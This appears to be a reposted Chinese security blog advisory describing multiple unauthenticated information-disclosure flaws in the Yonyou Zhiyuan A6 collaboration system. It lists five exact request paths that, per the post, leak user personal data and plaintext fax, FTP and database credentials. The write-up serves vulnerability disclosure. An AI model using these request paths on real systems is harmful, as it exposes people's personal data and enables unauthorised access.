用友致远A6协同管理系统多处敏感信息泄露

admin 2022年12月22日13:58:02评论167 views字数 1113阅读3分42秒阅读模式
用友致远A6协同管理系统多处敏感信息泄露
    文章声明

安全技术类文章仅供参考,此文所提供的信息仅针对漏洞靶场进行渗透,未经授权请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

一、漏洞描述

用友致远A6协同管理系统:面向广大的企事业组织应用设计,是一个基于互联网的高效协同工作平台和优秀的协同管理系统。它融入先进的协同管理理念,运用领先的网络技术,切实有效的解决企事业组织工作管理中的关键应用。利用它可把日常管理中的业务、事务、事件等信息在单位、部门、组群、个人之间进行及时高效、有序可控、全程共享的沟通和处理。是一套非常适合国情的、并具有很高性价比的软件。

用友致远A6协同管理系统对敏感文件的访问权限设置不当,导致了多处敏感信息泄漏。泄露的信息包括:

1)使用该系统用户的真实姓名、用户名、电话号码、邮箱、身份证、所在公司的部门、职位、工号等等

2)传真服务器的配置信息(ip地址、登录用户名/明文密码)、FTP账号/明文密码、数据库的名称/数据库用户名/明文密码等

3)获取数据库账户以及密码 MD5。

4)下载OA中的用户信息

二、漏洞复现

系统首页地址及页面显示如下

http://xx.xx.xx.xx/yyoa/index.jsp

用友致远A6协同管理系统多处敏感信息泄露

1、initDataAssess.jsp 用户敏感信息泄露漏洞

http://xx.xx.xx.xx/yyoa/assess/js/initDataAssess.jsp

用友致远A6协同管理系统多处敏感信息泄露

2、reloadData.jsp 用户敏感信息泄露漏洞

http://xx.xx.xx.xx/yyoa/common/SelectPerson/reloadData.jsp

这里需要查看网页源码才能看到信息

用友致远A6协同管理系统多处敏感信息泄露

3、config.jsp 敏感信息泄漏漏洞

http://xx.xx.xx.xx/yyoa/ext/trafaxserver/SystemManage/config.jsp

用友致远A6协同管理系统多处敏感信息泄露

4、createMysql.jsp 数据库敏感信息泄露漏洞

http://xx.xx.xx.xx/yyoa/createMysql.jsphttp://xx.xx.xx.xx/yyoa/ext/createMysql.jsp

用友致远A6协同管理系统多处敏感信息泄露

5、DownExcelBeanServlet 用户敏感信息泄露

http://xx.xx.xx.xx/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0

用友致远A6协同管理系统多处敏感信息泄露

用友致远A6协同管理系统多处敏感信息泄露

原文始发于微信公众号(守卫者安全):用友致远A6协同管理系统多处敏感信息泄露

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月22日13:58:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友致远A6协同管理系统多处敏感信息泄露https://cn-sec.com/archives/1461819.html

发表评论

匿名网友 填写信息